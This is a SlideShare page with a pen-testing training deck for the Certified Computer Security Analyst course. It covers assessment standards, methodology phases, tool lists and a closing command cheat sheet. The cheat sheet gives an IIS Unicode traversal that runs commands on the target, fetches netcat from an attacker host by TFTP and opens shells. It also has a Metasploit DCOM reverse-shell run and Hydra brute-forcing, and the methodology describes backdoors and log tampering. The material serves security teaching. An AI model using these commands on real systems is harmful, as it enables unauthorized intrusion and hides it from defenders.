SlideShare une entreprise Scribd logo

NSA and PT

Rahmat Suhatman
Rahmat Suhatman

The document provides information about the Certified Computer Security Analyst (CCSA) program and training. It discusses the trainer, Semi Yulianto's qualifications and experience working with various security training and consulting organizations. It also lists some of the key topics covered in the CCSA training program, including vulnerabilities assessment, penetration testing methodology, security tools, and investigating vulnerabilities.

Formation
1  sur  47
Program: Certified Computer Security Analyst (CCSA) LSP Telematika Created By Semi Yulianto Shared By Linuxer@kaskus.co.id
Semi Yulianto MCT, MCP, MCSA, MCSE, MCSA & MCSE: Security, MCTS, MCITP, CCNA, CCNP, CNI, CNA, CNE, CCA, CIW-CI, CIW-SA, CEI, CEH, ECSA, CHFI, EDRP, ECSP, etc  Independent Trainer and Consultant  EC-Council Indonesia & Asia Pacific (Jakarta, Indonesia) Current Roles: ITS2 (Riyadh, Saudi Arabia) Senior Technical Trainer/Security Consultant IshanTech (M) Sdn Bhd (Kuala Lumpur, Malaysia)  Security Consultant (Web Application Pen-Tester)  Security Consultant (ESET Anti-Virus & Smart Security) semi.yulianto@flexi-learn.com and semi.yulianto2009@gmail.com Contacts: +62 852 1325 6600 and +60 14 9377 462
1. Vulnerabilities by Management Categories 2. Assessment Standards 3. Assessment Service Definition 4. Network Assessment Methodology 5. Pen-Test Methodology 6. Security Tools 7. Investigating Vulnerabilities
OS configuration - Vulnerabilities due to improperly configured operating system software.  Software maintenance - Vulnerabilities due to failure to apply patches to known vulnerabilities.  Password/access control - Failure to comply with password policy and improper access control settings.  Malicious software - Existence of malicious software (Trojans, worms, etc.) or evidence of use.  Dangerous services - Existence of vulnerable or easily exploited services or processes.  Application configuration - Vulnerabilities due to improperly configured applications. 
The United States National Security Agency (NSA) has provided an NSA (US) INFOSEC Assessment Methodology (IAM) framework to help consultants  and security professionals outside the NSA provide assessment services to clients in line with a recognized standard. http://www.iatrp.com The Government Communications Headquarters (GCHQ) in the United CESG CHECK (UK) Kingdom has an information assurance arm known as the Communications   and Electronics security consultants outside the NSA to provide assessment services, CESG operates a program known as CHECK to evaluate and accredit security Security Group (CESG). In the same way that the NSA IAM framework allows testing teams within the U.K. to undertake government assessment work. http://www.cesg.gov.uk/site/check/index.cfm
 Assessment - Level 1 involves discovering a cooperative high- The IAM framework defines three levels of assessment: level overview of the organization being assessed, including access to policies, procedures, and information flow. No hands- on network or system testing is undertaken at this level. Evaluation - Level 2 is a hands-on cooperative process that involves testing with network scanning, penetration tools, and the use of specific technical expertise.  Red Team - Level 3 is non cooperative and external to the target network, involving penetration testing to simulate the appropriate adversary. IAM assessment is on intrusive, so within  this framework, a Level 3 assessment involves full qualification of vulnerabilities.
1. Use of DNS information retrieval tools for both single and The CESG CHECK network security assessment as: multiple records, including an understanding of DNS record structure relating to target hosts. 2. Use of ICMP, TCP, and UDP network mapping and probing tools 3. Demonstration of TCP service banner grabbing. 4. Information retrieval using SNMP, including an understanding of MIB structure relating to target system configuration and network routes. 5. Understanding of common weaknesses in routers and switches relating to Telnet, HTTP, SNMP, and TFTP access and configuration.
1. User enumeration via finger, rusers, rwho, and SMTP CESG CHECK Unix-specific competencies: techniques 2. Use of tools to enumerate Remote Procedure Call (RPC) services and demonstrate an understanding of the security implications associated with those services. 3. Demonstration of testing for Network File System (NFS) weaknesses. 4. Testing for weaknesses within r-services (rsh, rexec, and rlogin). 5. Detection of insecure X Windows servers. 6. Testing for weaknesses within web, FTP, and Samba services.
1. Assessment of NetBIOS and CIFS services to enumerate CESG CHECK Windows NT-specific competencies: users, groups, shares, domains, domain controllers, password policies, and associated weaknesses. 2. Username and password grinding via NetBIOS and CIFS services. 3. Detecting and demonstrating presence of known security weaknesses within. 4. Internet Information Server (IIS) web and FTP service components, and Microsoft SQL Server.
 ISECOM’s Open Source Security Testing Methodology Other Assessment Standards & Associations: Manual (OSSTMM) http://www.osstmm.org  Council of Registered Ethical Security Testers (CREST) http://www.crestapproved.com  TIGER Scheme http://www.tigerscheme.org  EC-Council’s Certified Ethical Hacker (CEH) http://www.eccouncil.org/CEH.htm  Open Source Web Application Security Project (OWASP) http://www.owasp.org
1. Vulnerability Scanning 2. Network Security Assessment 3. Web Application Testing 4. Penetration Testing 5. Onsite Audit
Uses automated systems (such as Nessus, ISS Internet Vulnerability Scanning Scanner, QualysGuard, or eEye Retina) with minimal  hands-on qualification and assessment of vulnerabilities. This is an inexpensive way to ensure that no obvious vulnerabilities exist, but it doesn’t provide a clear strategy to improve security. An effective blend of automated and hands-on manual Network Security Assessment vulnerability testing and qualification. The report is  usually handwritten, accurate, and concise, giving practical advice that can improve a company’s security.
Involves post-authentication assessment of web application Web Application Testing components, identifying command injection, poor  permissions, and other weaknesses within a given web application. Testing at this level involves extensive manual qualification and consultant involvement, and it cannot be easily automated. Involves multiple attack vectors (e.g., telephone war dialing, Penetration Testing social engineering, and wireless testing) to compromise the  target environment. It demonstrates and discusses the methodologies adopted by determined Internet-based attackers to compromise IP networks remotely, which in turn will allow you to improve IP network security.
Provides the clearest picture of network security.  Onsite Audition Consultants have local system access and run tools on each system capable of identifying anything untoward, including rootkits, weak user passwords, poor permissions, and other issues. 802.11 wireless testing is often performed as part of onsite auditing.
1. Network reconnaissance to identify IP networks High-level components of Network Assessment: and hosts of interest. 2. Bulk network scanning and probing to identify potentially vulnerable hosts. 3. Investigation of vulnerabilities and further network probing by hand. 4. Exploitation of vulnerabilities and circumvention of security mechanisms.
1. Information Gathering 2. Service Enumeration 3. Vulnerability Identification 4. Penetration 5. Maintaining Access 6. Housekeeping
The objective of information gathering is to find as  Information Gathering many information as possible about the target of evaluation by using passive (Google, Whois, WWW) or active (social engineering) information gathering. Involves launching network and port scanning to  Service Enumeration find open, filtered ports and services running on a specific port.
Involves finding new and currently available  Vulnerability Identification vulnerability on the operating systems, applications and/or services (manual or automated). Involves active penetration on a specific target of  Penetration evaluation by exploiting any new or known vulnerability.
Involves uploading trojan or backdoor with the Maintaining Access objective to make it easier to go in and out from a  target of evaluation without having to do the exploitation and ensure that the activities are not being noticed. Clearning up to cover tracks. Involves disabling Housekeeping audit settings and clearing or altering log files  (system, security and application).
1. Nmap (http://www.insecure.org) Scanning Tools: 2. Nessus (http://www.nessus.org) 3. ISS Internet Scanner (http://www.iss.net) 4. eEye Retina (http://www.eeye.com) 5. QualysGuard (http://www.qualys.com) 6. Matta Colossus (http://www.trustmatta.com)
1. Metasploit Framework Exploitation Frameworks: (http://www.metasploit.com) 2. Core IMPACT (http://www.coresecurity.com) 3. Immunity CANVAS (http://www.immunityinc.com/products- canvas.shtml)
1. Paros (http://www.parosproxy.org) Proxy-based web application testing tools: 2. WebScarab http://www.owasp.org/index.php/Category:OWAS P_WebScarab_Project) 3. Burp suite (http://portswigger.net)
1. Wapiti (http://wapiti.sourceforge.net) Active web application crawling and fuzzing tools: 2. Nikto (http://www.cirt.net/code/nikto.shtml)
1. Acunetix Web Vulnerability Scanner Web Application Scanning Tools: (http://www.acunetix.com) 2. Watchfire AppScan (http://www.watchfire.com/products/appscan/) 3. SPI Dynamics WebInspect (http://www.spidynamics.com/products/webinspe ct/) 4. Cenzic Hailstorm (http://www.cenzic.com/products_services/cenzic _hailstorm.php)
1. Securiteam (http://www.securiteam.com) Useful Websites: 2. SecurityFocus (http://www.securityfocus.com) 3. milw0rm (http://www.milw0rm.com) 4. Offensive Security Exploit DB (http://www.exploit-db.com) 5. Packet Storm (http://www.packetstormsecurity.org) 6. FrSIRT (http://www.frsirt.com) 7. MITRE Corporation CVE (http://cve.mitre.org) 8. NIST National Vulnerability Database (http://nvd.nist.gov) 9. ISS X-Force (http://xforce.iss.net) 10. CERT vulnerability notes (http://www.kb.cert.org/vuls) 11. eEye Preview (http://research.eeye.com/html/services) 12. 3Com TippingPoint DVLabs (http://dvlabs.tippingpoint.com) 13. VeriSign iDefense Security Intelligence Services (http://labs.idefense.com/services)
1. Information Gathering 2. Service Identification 3. Vulnerability Identification 4. Penetration (Exploitation) 5. Maintaining Access 6. Housekeeping (Covering Tracks) 7. Password Cracking 8. Client-Side Hacking 9. Web Application Hacking 10. Denial-of-Service (DoS) Attacks 11. Sniffing and ARP Spoofing 12. Wireless Hacking 13. Linux Hacking 14. Analyzing Attack Signatures with IDS and Sniffer 15. Evading IDS and Firewall
IIS Unicode Directory Traversal Exploit  Syntax: nc –v <target_ip> <http_port> GET http://<target_ip>/scripts/<unicode_string s>/<windows_dir>/cmd.exe?/c+<command>  Example: nc –v 131.107.1.101 80 GET http://131.107.1.101/scripts/..%255c../win nt/system32/cmd.exe?/c+dir
TFTP (Trivial File Transfer Protocol) Upload and Download  Syntax: tftp –i <localhost_ip> GET <file> tftp –i <localhost_ip> PUT <file>  Example: tftp –i 131.107.1.252 GET nc.exe tftp –i 131.107.1.101 PUT nc.exe  Unicode Examples: GET http://131.107.1.101/scripts/..%255c../winnt/syste m32/cmd.exe?/c+tftp+-i+131.107.1.252+GET+nc.exe
Netcat (Network Swiss Army Knife) Server Mode (listening/reverse TCP)  Syntax: nc –v –l –p <port_to_listen_to> nc –vlp <port_to_listen_to>  Example: nc –v –l –p 555 nc –vlp 555
Netcat (Network Swiss Army Knife) Client Mode (connecting/bind TCP)  Syntax: nc –v <target_ip> <target_port>  Example: nc –v 131.107.1.101 555
Netcat (Network Swiss Army Knife) Server Mode (listening/reverse TCP)  Syntax: nc –v –l –p <listening_port>  Unicode Syntax: GET http://<target_ip>/scripts/<unicode_strings>/<wind ows_dir>/cmd.exe?/c+<command>  Example: GET http://131.107.1.101/scripts/..%255c../winnt/syste m32/cmd.exe?/c+nc+-v+-l+-p+5555
Netcat (Network Swiss Army Knife) Client Mode (connecting/bind TCP)  Syntax: nc –v <target_ip> <target_port>  Unicode Syntax: GET http://<target_ip>/scripts/<unicode_strings>/<wind ows_dir>/cmd.exe?/c+<command>  Example: GET http://131.107.1.101/scripts/..%255c../winnt/syste m32/cmd.exe?/c+nc+-v+131.107.1.252+555
Nmap (Ping Sweep/Network Scan)  Syntax: nmap –sP <network_id>  Example: nmap –sP 131.107.1.0/24 Nmap (Port Scan)  Syntax: nmap <target_ip>  Example: nmap 131.107.1.101
Nmap (Port Scan with Options)  Syntax: nmap <option> <target_ip>  Examples: nmap –sS –sV –O 131.107.1.101 nmap –sS –sV –p80,443 –O 131.107.1.101 nmap –sS –sV –p80,443 –O –T4 131.107.1.101 nmap –sS –sV –p80,443 –O –T4 –PN 131.107.1.101 nmap –sU –sV –O 131.107.1.101 nmap –A 131.107.1.101
Nmap (Enumeration)  Syntax: nmap <option> <script> <target_ip>  Examples: nmap –sS –script=smb-enum-users 131.107.1.101 nmap –sS –script=smb-enum-shares 131.107.1.101 nmap –sS –script=smb-enum-domains 131.107.1.101 nmap –sS –script=smb-enum-processes 131.107.1.101 nmap –sS –script=smb-enum-security 131.107.1.101
Metasploit Framework Exploit Module (MSFConsole) cd /pentest/exploits/msf3 ./msfconsole  Syntax: msf > help msf > show exploits msf > use <exploit_module> msf > show payloads msf > set PAYLOAD <payload_type> msf > show options msf > set RHOST <target_ip> msf > set LHOST <localhost_ip> msf > set LPORT <local_port> msf > set RPORT <remote_port> msf > show targets msf > set TARGET <target_id> msf > exploit
Metasploit Framework Exploit Module (MSFConsole) cd /pentest/exploits/msf3 ./msfconsole  Example: msf > help msf > show exploits msf > use windows/dcerpc/ms03_026_dcom msf > show payloads msf > set PAYLOAD windows/shell/reverse_tcp msf > show options msf > set RHOST 131.107.1.101 msf > set LHOST 131.107.1.252 msf > set LPORT 5555 msf > set RPORT 1234 msf > show targets msf > set TARGET 0 msf > exploit
Metasploit Framework Auxiliary Module cd /pentest/exploits/msf3 ./msfconsole  Syntax: msf > help msf > show auxiliary msf > use <auxiliary_module> msf > set RHOSTS <target_ip_or_network_id> msf > run
Metasploit Framework Auxiliary Module cd /pentest/exploits/msf3 ./msfconsole  Example 1: msf > help msf > show auxiliary msf > use scanner/smb/smb_version msf > set RHOSTS 131.107.1.101 msf > run  Example 2: msf > help msf > show auxiliary msf > use scanner/smb/smb_version msf > set RHOSTS 131.107.1.0/24 msf > run
Metasploit Framework Exploit Module (MSFCLI) cd /pentest/exploits/msf3  Syntax: ./msfcli <exploit_module> <payload_type> <options> E  Example: ./msfcli windows/dcerpc/ms03_026_dcom PAYLOAD=windows/shell/bind_tcp RHOST=131.107.1.101 E
THC Hydra (Dictionary-based Password Cracking) cd /tmp  Syntax: ./hydra –L <users_file> -P <passwords_file> <target_ip> <service_type>  Examples: ./hydra –L login.txt –P pass.txt 131.107.1.101 ftp ./hydra –L login.txt –P pass.txt 131.107.1.101 smb ./hydra –L login.txt –P pass.txt 131.107.1.101 mssql ./hydra –L login.txt –P pass.txt 131.107.1.101 rpc
Nikto (Web Application Vulnerability Scanner) cd /pentest/nikto  Syntax: ./nikto.pl –host <target_ip>  Example: ./nikto.pl –host 131.107.1.101

Recommandé

Network Security Fundamentals
Network Security FundamentalsNetwork Security Fundamentals
Network Security FundamentalsRahmat Suhatman
 
Introduction Network security
Introduction Network securityIntroduction Network security
Introduction Network securityIGZ Software house
 
Network and security concepts
Network and security conceptsNetwork and security concepts
Network and security conceptssonuagain
 
Network Security Risk
Network Security RiskNetwork Security Risk
Network Security RiskDedi Dwianto
 
Network Security Fundamentals
Network Security FundamentalsNetwork Security Fundamentals
Network Security FundamentalsFat-Thing Gabriel-Culley
 
Network Security: Attacks, Tools and Techniques
Network Security: Attacks, Tools and TechniquesNetwork Security: Attacks, Tools and Techniques
Network Security: Attacks, Tools and Techniqueswaqasahmad1995
 
Network Security
Network SecurityNetwork Security
Network SecurityRaymond Jose
 
Network management and security
Network management and securityNetwork management and security
Network management and securityAnkit Bhandari
 

Recommandé

Network Security Fundamentals
Network Security FundamentalsNetwork Security Fundamentals
Network Security FundamentalsRahmat Suhatman
 
Introduction Network security
Introduction Network securityIntroduction Network security
Introduction Network securityIGZ Software house
 
Network and security concepts
Network and security conceptsNetwork and security concepts
Network and security conceptssonuagain
 
Network Security Risk
Network Security RiskNetwork Security Risk
Network Security RiskDedi Dwianto
 
Network Security Fundamentals
Network Security FundamentalsNetwork Security Fundamentals
Network Security FundamentalsFat-Thing Gabriel-Culley
 
Network Security: Attacks, Tools and Techniques
Network Security: Attacks, Tools and TechniquesNetwork Security: Attacks, Tools and Techniques
Network Security: Attacks, Tools and Techniqueswaqasahmad1995
 
Network Security
Network SecurityNetwork Security
Network SecurityRaymond Jose
 
Network management and security
Network management and securityNetwork management and security
Network management and securityAnkit Bhandari
 
Network security ppt
Network security pptNetwork security ppt
Network security pptOECLIB Odisha Electronics Control Library
 
Wireless Networking
Wireless NetworkingWireless Networking
Wireless NetworkingGulshanAra14
 
Information Security Lecture Notes
Information Security Lecture NotesInformation Security Lecture Notes
Information Security Lecture NotesFellowBuddy.com
 
Network security
Network securityNetwork security
Network securityNkosinathi Lungu
 
Network security
Network securityNetwork security
Network securityAkhilesh Jain
 
Ancaman & kelemahan server
Ancaman & kelemahan serverAncaman & kelemahan server
Ancaman & kelemahan serverDedi Dwianto
 
Network security
Network securityNetwork security
Network securityAli Kamil
 
امن نظم المعلومات وامن الشبكات
امن نظم المعلومات وامن الشبكاتامن نظم المعلومات وامن الشبكات
امن نظم المعلومات وامن الشبكاتAmr Rashed
 
Network security - Basic concepts
Network security - Basic conceptsNetwork security - Basic concepts
Network security - Basic conceptsKhoa Nguyen
 
What is Network Security?
What is Network Security?What is Network Security?
What is Network Security?Faith Zeller
 
Ne Course Part Two
Ne Course Part TwoNe Course Part Two
Ne Course Part Twobackdoor
 
Network security
Network security Network security
Network securityVikas Jagtap
 
Network Security Chapter 7
Network Security Chapter 7Network Security Chapter 7
Network Security Chapter 7AfiqEfendy Zaen
 
Internet safety and you
Internet safety and youInternet safety and you
Internet safety and youArt Ocain
 
Network security - Defense in Depth
Network security - Defense in DepthNetwork security - Defense in Depth
Network security - Defense in DepthDilum Bandara
 
Network security presentation
Network security presentationNetwork security presentation
Network security presentationKudzai Rerayi
 
Computer security
Computer securityComputer security
Computer securityEktaVaswani2
 
Windows network security
Windows network securityWindows network security
Windows network securityInformation Technology
 
Network Security
Network SecurityNetwork Security
Network Securityforpalmigho
 
Modern Network Security Issue and Challenge
Modern Network Security Issue and ChallengeModern Network Security Issue and Challenge
Modern Network Security Issue and ChallengeIkhtiar Khan Sohan
 
Network Security Presentation
Network Security PresentationNetwork Security Presentation
Network Security PresentationAllan Pratt MBA
 
Network security
Network securityNetwork security
Network securityGichelle Amon
 

Contenu connexe

Tendances

Wireless Networking
Wireless NetworkingWireless Networking
Wireless NetworkingGulshanAra14
 
Information Security Lecture Notes
Information Security Lecture NotesInformation Security Lecture Notes
Information Security Lecture NotesFellowBuddy.com
 
Ancaman & kelemahan server
Ancaman & kelemahan serverAncaman & kelemahan server
Ancaman & kelemahan serverDedi Dwianto
 
Network security
Network securityNetwork security
Network securityAli Kamil
 
امن نظم المعلومات وامن الشبكات
امن نظم المعلومات وامن الشبكاتامن نظم المعلومات وامن الشبكات
امن نظم المعلومات وامن الشبكاتAmr Rashed
 
Network security - Basic concepts
Network security - Basic conceptsNetwork security - Basic concepts
Network security - Basic conceptsKhoa Nguyen
 
What is Network Security?
What is Network Security?What is Network Security?
What is Network Security?Faith Zeller
 
Ne Course Part Two
Ne Course Part TwoNe Course Part Two
Ne Course Part Twobackdoor
 
Network Security Chapter 7
Network Security Chapter 7Network Security Chapter 7
Network Security Chapter 7AfiqEfendy Zaen
 
Internet safety and you
Internet safety and youInternet safety and you
Internet safety and youArt Ocain
 
Network security - Defense in Depth
Network security - Defense in DepthNetwork security - Defense in Depth
Network security - Defense in DepthDilum Bandara
 
Network security presentation
Network security presentationNetwork security presentation
Network security presentationKudzai Rerayi
 
Network Security
Network SecurityNetwork Security
Network Securityforpalmigho
 
Modern Network Security Issue and Challenge
Modern Network Security Issue and ChallengeModern Network Security Issue and Challenge
Modern Network Security Issue and ChallengeIkhtiar Khan Sohan
 

Tendances (20)

Network security ppt
Network security pptNetwork security ppt
Network security ppt
 
Wireless Networking
Wireless NetworkingWireless Networking
Wireless Networking
 
Information Security Lecture Notes
Information Security Lecture NotesInformation Security Lecture Notes
Information Security Lecture Notes
 
Network security
Network securityNetwork security
Network security
 
Network security
Network securityNetwork security
Network security
 
Ancaman & kelemahan server
Ancaman & kelemahan serverAncaman & kelemahan server
Ancaman & kelemahan server
 
Network security
Network securityNetwork security
Network security
 
امن نظم المعلومات وامن الشبكات
امن نظم المعلومات وامن الشبكاتامن نظم المعلومات وامن الشبكات
امن نظم المعلومات وامن الشبكات
 
Network security - Basic concepts
Network security - Basic conceptsNetwork security - Basic concepts
Network security - Basic concepts
 
What is Network Security?
What is Network Security?What is Network Security?
What is Network Security?
 
Ne Course Part Two
Ne Course Part TwoNe Course Part Two
Ne Course Part Two
 
Network security
Network security Network security
Network security
 
Network Security Chapter 7
Network Security Chapter 7Network Security Chapter 7
Network Security Chapter 7
 
Internet safety and you
Internet safety and youInternet safety and you
Internet safety and you
 
Network security - Defense in Depth
Network security - Defense in DepthNetwork security - Defense in Depth
Network security - Defense in Depth
 
Network security presentation
Network security presentationNetwork security presentation
Network security presentation
 
Computer security
Computer securityComputer security
Computer security
 
Windows network security
Windows network securityWindows network security
Windows network security
 
Network Security
Network SecurityNetwork Security
Network Security
 
Modern Network Security Issue and Challenge
Modern Network Security Issue and ChallengeModern Network Security Issue and Challenge
Modern Network Security Issue and Challenge
 

En vedette

Network Security Presentation
Network Security PresentationNetwork Security Presentation
Network Security PresentationAllan Pratt MBA
 
Virtual host and certificate authority
Virtual host and certificate authorityVirtual host and certificate authority
Virtual host and certificate authorityAhmad Sayuti
 
Curriclum Vitae - Adi Prayitno
Curriclum Vitae - Adi PrayitnoCurriclum Vitae - Adi Prayitno
Curriclum Vitae - Adi PrayitnoAdi Prayitno
 
Bastion host topologi jaringan
Bastion host topologi jaringanBastion host topologi jaringan
Bastion host topologi jaringanMunir Putra
 
Setting local domain di virtual host
Setting local domain di virtual hostSetting local domain di virtual host
Setting local domain di virtual hostFgroupIndonesia
 
Modul mengamankan jaringan menggunakan arp reply only menggunakan mikrotik os
Modul mengamankan jaringan menggunakan arp reply only menggunakan mikrotik osModul mengamankan jaringan menggunakan arp reply only menggunakan mikrotik os
Modul mengamankan jaringan menggunakan arp reply only menggunakan mikrotik osEen Pahlefi
 
Presentation Progress TA
Presentation Progress TA Presentation Progress TA
Presentation Progress TA Arif Wahyudi
 
Modul mengamankan jaringan dhcp server menggunakan arp reply only menggunakan...
Modul mengamankan jaringan dhcp server menggunakan arp reply only menggunakan...Modul mengamankan jaringan dhcp server menggunakan arp reply only menggunakan...
Modul mengamankan jaringan dhcp server menggunakan arp reply only menggunakan...Een Pahlefi
 
MUM Middle East 2016 - System Integration Analyst
MUM Middle East 2016 - System Integration AnalystMUM Middle East 2016 - System Integration Analyst
MUM Middle East 2016 - System Integration AnalystFajar Nugroho
 
Konfigurasi Access Point menjadi Repeater dan WDS
Konfigurasi Access Point menjadi Repeater dan WDSKonfigurasi Access Point menjadi Repeater dan WDS
Konfigurasi Access Point menjadi Repeater dan WDSmfaad
 
Konfigurasi dasar Cisco Router
Konfigurasi dasar Cisco RouterKonfigurasi dasar Cisco Router
Konfigurasi dasar Cisco RouterAldi Nor Fahrudin
 
Trend Kejahatan Cyber 2015
Trend Kejahatan Cyber 2015Trend Kejahatan Cyber 2015
Trend Kejahatan Cyber 2015Dedi Dwianto
 
Application Security Trends and Issues
Application Security Trends and IssuesApplication Security Trends and Issues
Application Security Trends and IssuesDedi Dwianto
 
Penetration Tool Berbasis Sistem Terdistribusi untuk Analisa Vulnerability Pa...
Penetration Tool Berbasis Sistem Terdistribusi untuk Analisa Vulnerability Pa...Penetration Tool Berbasis Sistem Terdistribusi untuk Analisa Vulnerability Pa...
Penetration Tool Berbasis Sistem Terdistribusi untuk Analisa Vulnerability Pa...idsecconf
 

En vedette (20)

Network Security Presentation
Network Security PresentationNetwork Security Presentation
Network Security Presentation
 
Network security
Network securityNetwork security
Network security
 
Virtual host and certificate authority
Virtual host and certificate authorityVirtual host and certificate authority
Virtual host and certificate authority
 
Curriclum Vitae - Adi Prayitno
Curriclum Vitae - Adi PrayitnoCurriclum Vitae - Adi Prayitno
Curriclum Vitae - Adi Prayitno
 
Bastion host topologi jaringan
Bastion host topologi jaringanBastion host topologi jaringan
Bastion host topologi jaringan
 
Networking recap
Networking recapNetworking recap
Networking recap
 
Setting local domain di virtual host
Setting local domain di virtual hostSetting local domain di virtual host
Setting local domain di virtual host
 
Modul mengamankan jaringan menggunakan arp reply only menggunakan mikrotik os
Modul mengamankan jaringan menggunakan arp reply only menggunakan mikrotik osModul mengamankan jaringan menggunakan arp reply only menggunakan mikrotik os
Modul mengamankan jaringan menggunakan arp reply only menggunakan mikrotik os
 
Presentation Progress TA
Presentation Progress TA Presentation Progress TA
Presentation Progress TA
 
Sosialisasi kurikulum 2016
Sosialisasi kurikulum 2016Sosialisasi kurikulum 2016
Sosialisasi kurikulum 2016
 
Modul mengamankan jaringan dhcp server menggunakan arp reply only menggunakan...
Modul mengamankan jaringan dhcp server menggunakan arp reply only menggunakan...Modul mengamankan jaringan dhcp server menggunakan arp reply only menggunakan...
Modul mengamankan jaringan dhcp server menggunakan arp reply only menggunakan...
 
Trouble shooting windows
Trouble shooting windowsTrouble shooting windows
Trouble shooting windows
 
MUM Middle East 2016 - System Integration Analyst
MUM Middle East 2016 - System Integration AnalystMUM Middle East 2016 - System Integration Analyst
MUM Middle East 2016 - System Integration Analyst
 
Konfigurasi Access Point menjadi Repeater dan WDS
Konfigurasi Access Point menjadi Repeater dan WDSKonfigurasi Access Point menjadi Repeater dan WDS
Konfigurasi Access Point menjadi Repeater dan WDS
 
Konfigurasi dasar Cisco Router
Konfigurasi dasar Cisco RouterKonfigurasi dasar Cisco Router
Konfigurasi dasar Cisco Router
 
Trend Kejahatan Cyber 2015
Trend Kejahatan Cyber 2015Trend Kejahatan Cyber 2015
Trend Kejahatan Cyber 2015
 
Application Security Trends and Issues
Application Security Trends and IssuesApplication Security Trends and Issues
Application Security Trends and Issues
 
Pendampingan HelpDesk
Pendampingan HelpDeskPendampingan HelpDesk
Pendampingan HelpDesk
 
Penetration Tool Berbasis Sistem Terdistribusi untuk Analisa Vulnerability Pa...
Penetration Tool Berbasis Sistem Terdistribusi untuk Analisa Vulnerability Pa...Penetration Tool Berbasis Sistem Terdistribusi untuk Analisa Vulnerability Pa...
Penetration Tool Berbasis Sistem Terdistribusi untuk Analisa Vulnerability Pa...
 
Mengenal Internet Security
Mengenal Internet SecurityMengenal Internet Security
Mengenal Internet Security
 

Similaire à NSA and PT

Security Testing Approach for Web Application Testing.pdf
Security Testing Approach for Web Application Testing.pdfSecurity Testing Approach for Web Application Testing.pdf
Security Testing Approach for Web Application Testing.pdfAmeliaJonas2
 
Vulnerability Analysis of 802.11 Authentications and Encryption Protocols: CV...
Vulnerability Analysis of 802.11 Authentications and Encryption Protocols: CV...Vulnerability Analysis of 802.11 Authentications and Encryption Protocols: CV...
Vulnerability Analysis of 802.11 Authentications and Encryption Protocols: CV...AM Publications
 
IRJET- Penetration Testing using Metasploit Framework: An Ethical Approach
IRJET- Penetration Testing using Metasploit Framework: An Ethical ApproachIRJET- Penetration Testing using Metasploit Framework: An Ethical Approach
IRJET- Penetration Testing using Metasploit Framework: An Ethical ApproachIRJET Journal
 
AKS IT Corporate Presentation
AKS IT Corporate PresentationAKS IT Corporate Presentation
AKS IT Corporate Presentationaksit_services
 
Best Practices, Types, and Tools for Security Testing in 2023.docx
Best Practices, Types, and Tools for Security Testing in 2023.docxBest Practices, Types, and Tools for Security Testing in 2023.docx
Best Practices, Types, and Tools for Security Testing in 2023.docxAfour tech
 
Infrastructure & Network Vulnerability Assessment and Penetration Testing
Infrastructure & Network Vulnerability Assessment and Penetration TestingInfrastructure & Network Vulnerability Assessment and Penetration Testing
Infrastructure & Network Vulnerability Assessment and Penetration TestingElanusTechnologies
 
Network Vulnerability and Patching
Network Vulnerability and PatchingNetwork Vulnerability and Patching
Network Vulnerability and PatchingEmmanuel Udeagha B.
 
What is the process of Vulnerability Assessment and Penetration Testing.pdf
What is the process of Vulnerability Assessment and Penetration Testing.pdfWhat is the process of Vulnerability Assessment and Penetration Testing.pdf
What is the process of Vulnerability Assessment and Penetration Testing.pdfElanusTechnologies
 
(VAPT) Vulnerability Assessment And Penetration Testing
(VAPT) Vulnerability Assessment And Penetration Testing(VAPT) Vulnerability Assessment And Penetration Testing
(VAPT) Vulnerability Assessment And Penetration TestingBluechip Gulf IT Services
 
Why Penetration Testing Services Cyber51
Why Penetration Testing Services Cyber51Why Penetration Testing Services Cyber51
Why Penetration Testing Services Cyber51martinvoelk
 
Phi 235 social media security users guide presentation
Phi 235 social media security users guide presentationPhi 235 social media security users guide presentation
Phi 235 social media security users guide presentationAlan Holyoke
 
Web application vulnerability assessment
Web application vulnerability assessmentWeb application vulnerability assessment
Web application vulnerability assessmentRavikumar Paghdal
 
Indexing Building Evaluation Criteria
Indexing Building Evaluation CriteriaIndexing Building Evaluation Criteria
Indexing Building Evaluation CriteriaIJERA Editor
 
IRJET- Cross Platform Penetration Testing Suite
IRJET- Cross Platform Penetration Testing SuiteIRJET- Cross Platform Penetration Testing Suite
IRJET- Cross Platform Penetration Testing SuiteIRJET Journal
 
Nt2580 Unit 7 Chapter 12
Nt2580 Unit 7 Chapter 12Nt2580 Unit 7 Chapter 12
Nt2580 Unit 7 Chapter 12Laura Arrigo
 
Cst 630 Extraordinary Success/newtonhelp.com
Cst 630 Extraordinary Success/newtonhelp.comCst 630 Extraordinary Success/newtonhelp.com
Cst 630 Extraordinary Success/newtonhelp.comamaranthbeg113
 
Cst 630 Motivated Minds/newtonhelp.com
Cst 630 Motivated Minds/newtonhelp.comCst 630 Motivated Minds/newtonhelp.com
Cst 630 Motivated Minds/newtonhelp.comamaranthbeg53
 

Similaire à NSA and PT (20)

Security Testing Approach for Web Application Testing.pdf
Security Testing Approach for Web Application Testing.pdfSecurity Testing Approach for Web Application Testing.pdf
Security Testing Approach for Web Application Testing.pdf
 
Vulnerability Analysis of 802.11 Authentications and Encryption Protocols: CV...
Vulnerability Analysis of 802.11 Authentications and Encryption Protocols: CV...Vulnerability Analysis of 802.11 Authentications and Encryption Protocols: CV...
Vulnerability Analysis of 802.11 Authentications and Encryption Protocols: CV...
 
IRJET- Penetration Testing using Metasploit Framework: An Ethical Approach
IRJET- Penetration Testing using Metasploit Framework: An Ethical ApproachIRJET- Penetration Testing using Metasploit Framework: An Ethical Approach
IRJET- Penetration Testing using Metasploit Framework: An Ethical Approach
 
Aksit profile final
Aksit profile finalAksit profile final
Aksit profile final
 
AKS IT Corporate Presentation
AKS IT Corporate PresentationAKS IT Corporate Presentation
AKS IT Corporate Presentation
 
Best Practices, Types, and Tools for Security Testing in 2023.docx
Best Practices, Types, and Tools for Security Testing in 2023.docxBest Practices, Types, and Tools for Security Testing in 2023.docx
Best Practices, Types, and Tools for Security Testing in 2023.docx
 
Infrastructure & Network Vulnerability Assessment and Penetration Testing
Infrastructure & Network Vulnerability Assessment and Penetration TestingInfrastructure & Network Vulnerability Assessment and Penetration Testing
Infrastructure & Network Vulnerability Assessment and Penetration Testing
 
Network Vulnerability and Patching
Network Vulnerability and PatchingNetwork Vulnerability and Patching
Network Vulnerability and Patching
 
What is the process of Vulnerability Assessment and Penetration Testing.pdf
What is the process of Vulnerability Assessment and Penetration Testing.pdfWhat is the process of Vulnerability Assessment and Penetration Testing.pdf
What is the process of Vulnerability Assessment and Penetration Testing.pdf
 
(VAPT) Vulnerability Assessment And Penetration Testing
(VAPT) Vulnerability Assessment And Penetration Testing(VAPT) Vulnerability Assessment And Penetration Testing
